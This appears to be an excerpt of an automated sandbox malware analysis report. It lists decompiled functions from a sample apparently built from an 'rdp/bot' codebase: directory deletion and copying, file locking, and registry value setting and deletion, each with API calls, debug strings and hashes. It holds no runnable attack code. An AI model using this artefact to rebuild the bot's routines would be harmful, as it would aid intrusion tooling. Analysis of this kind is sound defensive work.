strlen.MSVCRT ref: 00007FFE11506907
strcmp.MSVCRT ref: 00007FFE11506949
strcmp.MSVCRT ref: 00007FFE1150695C
RemoveDirectoryA.KERNEL32 ref: 00007FFE11506A05
GetLastError.KERNEL32 ref: 00007FFE11506A13

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115067E4
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE115067CE, 00007FFE11506A31
fs_dir_delete, xrefs: 00007FFE115067C7, 00007FFE115067F2, 00007FFE11506975, 00007FFE11506A2A, 00007FFE11506AF9, 00007FFE11506B5C
(path != NULL), xrefs: 00007FFE115067EB
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE11506B00
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FFE1150697C
NULL, xrefs: 00007FFE11506B4D
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE11506B63
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115067F9
*, xrefs: 00007FFE115068B4

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-812936415
Opcode ID: 13c90eca25d72b710558757fa98cc21ff6602da817c3a228f9be9adc5a6d1a88
Instruction ID: 9db69c19efba3b3e6e7a6dbbb2dfe9a1876f2358a4a9d24447e345feeea3f96a
Opcode Fuzzy Hash: 13c90eca25d72b710558757fa98cc21ff6602da817c3a228f9be9adc5a6d1a88
Instruction Fuzzy Hash: C2A1F6A1A0CE8385FB209B8794403FD639AAF813A4FB440B6D94E476B5EF7CE585C711

Function 00007FFE133041A9 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE133041CE
RemoveDirectoryA.KERNEL32 ref: 00007FFE133041E6
GetLastError.KERNEL32 ref: 00007FFE133041F0

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

strcpy.MSVCRT ref: 00007FFE133042BA
strlen.MSVCRT ref: 00007FFE133042C2
strlen.MSVCRT ref: 00007FFE133042DE
strlen.MSVCRT ref: 00007FFE133042EF
strcpy.MSVCRT ref: 00007FFE13304309
strlen.MSVCRT ref: 00007FFE13304311
strlen.MSVCRT ref: 00007FFE13304333
strlen.MSVCRT ref: 00007FFE13304347
strcmp.MSVCRT ref: 00007FFE13304389
strcmp.MSVCRT ref: 00007FFE1330439C
RemoveDirectoryA.KERNEL32 ref: 00007FFE13304445
GetLastError.KERNEL32 ref: 00007FFE13304453

Strings

fs_dir_delete, xrefs: 00007FFE13304207, 00007FFE13304232, 00007FFE133043B5, 00007FFE1330446A, 00007FFE13304539, 00007FFE1330459C
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE133045A3
NULL, xrefs: 00007FFE1330458D
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FFE133043BC
(path != NULL), xrefs: 00007FFE1330422B
*, xrefs: 00007FFE133042F4
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE1330420E, 00007FFE13304471
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13304239
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE13304540
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13304224

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-812936415
Opcode ID: 986671ed0631494871180cb31f5135f74694f96708304563f1cb51abeca53433
Instruction ID: cb5877846d885101dbadcfdfb94d2ea9b0141a78e1e6cd8c68cb2005a7ce202e
Opcode Fuzzy Hash: 986671ed0631494871180cb31f5135f74694f96708304563f1cb51abeca53433
Instruction Fuzzy Hash: AEA1B161A0CE828DFB209B57A5443FD6351AFA13A4F9400B2C56D776B6DF3CE6458B08

Function 00007FFE133047E7 Relevance: 43.8, APIs: 17, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FFE13304842
strlen.MSVCRT ref: 00007FFE1330484A
strlen.MSVCRT ref: 00007FFE1330486B
strlen.MSVCRT ref: 00007FFE1330487D
strcmp.MSVCRT ref: 00007FFE13304925
strcmp.MSVCRT ref: 00007FFE1330493D
strcat.MSVCRT ref: 00007FFE1330499D
strlen.MSVCRT ref: 00007FFE133049A5
strstr.MSVCRT ref: 00007FFE133049BA
strcpy.MSVCRT ref: 00007FFE13304A8B
strlen.MSVCRT ref: 00007FFE13304A93
strlen.MSVCRT ref: 00007FFE13304AB5
strcat.MSVCRT ref: 00007FFE13304ACE
strcpy.MSVCRT ref: 00007FFE13304AE1
strlen.MSVCRT ref: 00007FFE13304AE9
strlen.MSVCRT ref: 00007FFE13304B0B
strcat.MSVCRT ref: 00007FFE13304B27

Strings

*, xrefs: 00007FFE13304882
[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FFE13304CFE
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FFE133049D5
(dst != NULL), xrefs: 00007FFE13304A20
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FFE13304C8D
|, xrefs: 00007FFE133049AA
NULL, xrefs: 00007FFE13304CDF, 00007FFE13304CE8
fs_dir_copy, xrefs: 00007FFE133049CE, 00007FFE133049FC, 00007FFE13304A27, 00007FFE13304B3A, 00007FFE13304C86, 00007FFE13304CF7
(src != NULL), xrefs: 00007FFE133049F5
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FFE13304B41
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13304A03, 00007FFE13304A2E
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133049EE, 00007FFE13304A19

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strlen$strcatstrcpy$strcmp$strstr
String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 1797803443-1088979775
Opcode ID: 17b4f4cd293368b3ba9d7eed677e36c580ad60b789d88699f5b4c5df2e77724e
Instruction ID: 9e61b0f8751c31a3f4a902b4ace137e5842ca8663dc7613f9140b23dbf5e4282
Opcode Fuzzy Hash: 17b4f4cd293368b3ba9d7eed677e36c580ad60b789d88699f5b4c5df2e77724e
Instruction Fuzzy Hash: CCC1D661A0CE82D9F620C703D5443FE5751ABA53A4F8401B2DA7D376A6DF3DE606CB09

Function 00007FFE11506DA7 Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FFE11506E02
strlen.MSVCRT ref: 00007FFE11506E0A
strlen.MSVCRT ref: 00007FFE11506E2B
strlen.MSVCRT ref: 00007FFE11506E3D
strcmp.MSVCRT ref: 00007FFE11506EE5
strcmp.MSVCRT ref: 00007FFE11506EFD
strcat.MSVCRT ref: 00007FFE11506F5D
strlen.MSVCRT ref: 00007FFE11506F65
strcpy.MSVCRT ref: 00007FFE1150704B
strlen.MSVCRT ref: 00007FFE11507053
strlen.MSVCRT ref: 00007FFE11507075
strcat.MSVCRT ref: 00007FFE1150708E
strcpy.MSVCRT ref: 00007FFE115070A1
strlen.MSVCRT ref: 00007FFE115070A9
strlen.MSVCRT ref: 00007FFE115070CB
strcat.MSVCRT ref: 00007FFE115070E7

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11506FAE, 00007FFE11506FD9
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FFE1150724D
NULL, xrefs: 00007FFE1150729F, 00007FFE115072A8
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FFE11506F95
[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FFE115072BE
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FFE11507101
*, xrefs: 00007FFE11506E42
fs_dir_copy, xrefs: 00007FFE11506F8E, 00007FFE11506FBC, 00007FFE11506FE7, 00007FFE115070FA, 00007FFE11507246, 00007FFE115072B7
(dst != NULL), xrefs: 00007FFE11506FE0
|, xrefs: 00007FFE11506F6A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11506FC3, 00007FFE11506FEE
(src != NULL), xrefs: 00007FFE11506FB5

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strcatstrcpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 2140730755-1088979775
Opcode ID: a99da4092a415f809d1f114e9a415d6de03a6565f4b24626f2fe8f52248e582f
Instruction ID: be55bfbe1e2c8674475eeec30c603bc8956872870e31d9f2e25aa27c3c725d54
Opcode Fuzzy Hash: a99da4092a415f809d1f114e9a415d6de03a6565f4b24626f2fe8f52248e582f
Instruction Fuzzy Hash: 69C1C3A190CE8391FB218B96D5403FE635AAF853A4F9400BAD98D076F9DF7CE506C701

Function 00007FFE11507841 Relevance: 36.9, APIs: 5, Strings: 16, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE11507899
LockFileEx.KERNEL32 ref: 00007FFE115078D2
GetLastError.KERNEL32 ref: 00007FFE115079A7
GetLastError.KERNEL32 ref: 00007FFE11507A8C
CloseHandle.KERNEL32 ref: 00007FFE11507C00

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1150794C, 00007FFE1150797C
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FFE11507C24
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FFE115079BC
~, xrefs: 00007FFE11507B0D
NULL, xrefs: 00007FFE11507C0B
fs_file_lock, xrefs: 00007FFE11507926, 00007FFE1150795A, 00007FFE1150798A, 00007FFE115079B5, 00007FFE11507A9A, 00007FFE11507C1D
~, xrefs: 00007FFE11507A28
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507961, 00007FFE11507991
, xrefs: 00007FFE11507AAD
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1150792D
(path != NULL), xrefs: 00007FFE11507953
, xrefs: 00007FFE115079C8
(lock != NULL), xrefs: 00007FFE11507983
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FFE11507AA1
P, xrefs: 00007FFE11507A31
P, xrefs: 00007FFE11507B16

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
API String ID: 2747014929-2799703827
Opcode ID: 25a7fe5d7874ff3a3410145151dd17bc483f106532e2dff5e3268f45a7a8a479
Instruction ID: 3df976c8468cab06a0a502c9cebbb07bc8a97dea5e9ffb082d01eee00386fce6
Opcode Fuzzy Hash: 25a7fe5d7874ff3a3410145151dd17bc483f106532e2dff5e3268f45a7a8a479
Instruction Fuzzy Hash: A3814850E0CF4B81F7716B96A84037C32595F01778F5441BACAAE066F5FF6DAA85D302

Function 00007FFE13305281 Relevance: 36.9, APIs: 5, Strings: 16, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE133052D9
LockFileEx.KERNEL32 ref: 00007FFE13305312
GetLastError.KERNEL32 ref: 00007FFE133053E7
GetLastError.KERNEL32 ref: 00007FFE133054CC
CloseHandle.KERNEL32 ref: 00007FFE13305640

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1330536D
fs_file_lock, xrefs: 00007FFE13305366, 00007FFE1330539A, 00007FFE133053CA, 00007FFE133053F5, 00007FFE133054DA, 00007FFE1330565D
P, xrefs: 00007FFE13305556
, xrefs: 00007FFE133054ED
NULL, xrefs: 00007FFE1330564B
(lock != NULL), xrefs: 00007FFE133053C3
~, xrefs: 00007FFE1330554D
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FFE133054E1
P, xrefs: 00007FFE13305471
~, xrefs: 00007FFE13305468
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FFE133053FC
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FFE13305664
, xrefs: 00007FFE13305408
(path != NULL), xrefs: 00007FFE13305393
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133053A1, 00007FFE133053D1
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1330538C, 00007FFE133053BC

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
API String ID: 2747014929-2799703827
Opcode ID: efa6e9aefb3721e4e3d1491ec1bfe1554772be8d283f27de0c005768d19bb3ee
Instruction ID: 654a581f98918f7505fa09e4d992ed166560a1ddd8ebb57996302293193961b5
Opcode Fuzzy Hash: efa6e9aefb3721e4e3d1491ec1bfe1554772be8d283f27de0c005768d19bb3ee
Instruction Fuzzy Hash: 2A815370E0CF4BC9FA349B56A4443BC22505F30374F5416B2CA7E2A6F2EE6DA985930D

Function 00007FFE1150DEE9 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 201registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1150DF23
RegSetValueExA.ADVAPI32 ref: 00007FFE1150E04C
RegCloseKey.ADVAPI32 ref: 00007FFE1150E175

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1150E07A
(key != NULL), xrefs: 00007FFE1150DFBB
NULL, xrefs: 00007FFE1150E0A6, 00007FFE1150E25F, 00007FFE1150E26B
registry_set_value, xrefs: 00007FFE1150DF3D, 00007FFE1150DF92, 00007FFE1150DFC2, 00007FFE1150E002, 00007FFE1150E073, 00007FFE1150E18E
, xrefs: 00007FFE1150DF50
, xrefs: 00007FFE1150E086
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150E009
P, xrefs: 00007FFE1150E0F7
(root != NULL), xrefs: 00007FFE1150DF8B
P, xrefs: 00007FFE1150E100
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150DF44
, xrefs: 00007FFE1150DF61
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1150DF84, 00007FFE1150DFB4
P, xrefs: 00007FFE1150E1FA
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150E195
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150DF99, 00007FFE1150DFC9
, xrefs: 00007FFE1150E08F

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 716145365-253406552
Opcode ID: 56fd55c88b47a3bd48f6e474e1f48b8e0d98417949632ee02a8fd53b650c90ad
Instruction ID: 255e0b0e58b130f0e1d39dac6f62ad337f7d511021b48c7dd126392b89a37172
Opcode Fuzzy Hash: 56fd55c88b47a3bd48f6e474e1f48b8e0d98417949632ee02a8fd53b650c90ad
Instruction Fuzzy Hash: 66818F7190CF1B81FB30AB87A9403BD3269EF447A4F6401BAD95D466B5EE2DE984D302

Function 00007FFE13308669 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 201registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE133086A3
RegSetValueExA.ADVAPI32 ref: 00007FFE133087CC
RegCloseKey.ADVAPI32 ref: 00007FFE133088F5

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

(key != NULL), xrefs: 00007FFE1330873B
(root != NULL), xrefs: 00007FFE1330870B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13308719, 00007FFE13308749
[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE133087FA
P, xrefs: 00007FFE13308877
, xrefs: 00007FFE133086D0
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE13308789
NULL, xrefs: 00007FFE13308826, 00007FFE133089DF, 00007FFE133089EB
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE133086C4
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE13308704, 00007FFE13308734
, xrefs: 00007FFE1330880F
registry_set_value, xrefs: 00007FFE133086BD, 00007FFE13308712, 00007FFE13308742, 00007FFE13308782, 00007FFE133087F3, 00007FFE1330890E
P, xrefs: 00007FFE13308880
, xrefs: 00007FFE13308806
P, xrefs: 00007FFE1330897A
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308915
, xrefs: 00007FFE133086E1

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CloseOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 716145365-253406552
Opcode ID: dd6bf0ddd905deb28ef1524b925eb8f8d19467bfd533ff707fcc3a22a463325f
Instruction ID: a29522333a937f44595bcdfe84d02a06c76cd8a445f2754da1f75ed8c7a8b872
Opcode Fuzzy Hash: dd6bf0ddd905deb28ef1524b925eb8f8d19467bfd533ff707fcc3a22a463325f
Instruction Fuzzy Hash: 59816261A0CF4BCDFA30A716A94037D7A50AF30774E0401B2D97D6A6B7EE5DE985830E

Function 00007FFE1150DB84 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1150DBB9
RegDeleteValueA.ADVAPI32 ref: 00007FFE1150DCBE
RegCloseKey.ADVAPI32 ref: 00007FFE1150DDE7

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

P, xrefs: 00007FFE1150DE6C
, xrefs: 00007FFE1150DCF8
, xrefs: 00007FFE1150DBF7
, xrefs: 00007FFE1150DD01
(key != NULL), xrefs: 00007FFE1150DC51
[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1150DCEC
NULL, xrefs: 00007FFE1150DD18, 00007FFE1150DED1, 00007FFE1150DEDD
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150DC9F
(root != NULL), xrefs: 00007FFE1150DC21
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150DBDA
registry_del_value, xrefs: 00007FFE1150DBD3, 00007FFE1150DC28, 00007FFE1150DC58, 00007FFE1150DC98, 00007FFE1150DCE5, 00007FFE1150DE00
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1150DC1A, 00007FFE1150DC4A
P, xrefs: 00007FFE1150DD69
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150DE07
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150DC2F, 00007FFE1150DC5F
P, xrefs: 00007FFE1150DD72
, xrefs: 00007FFE1150DBE6

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

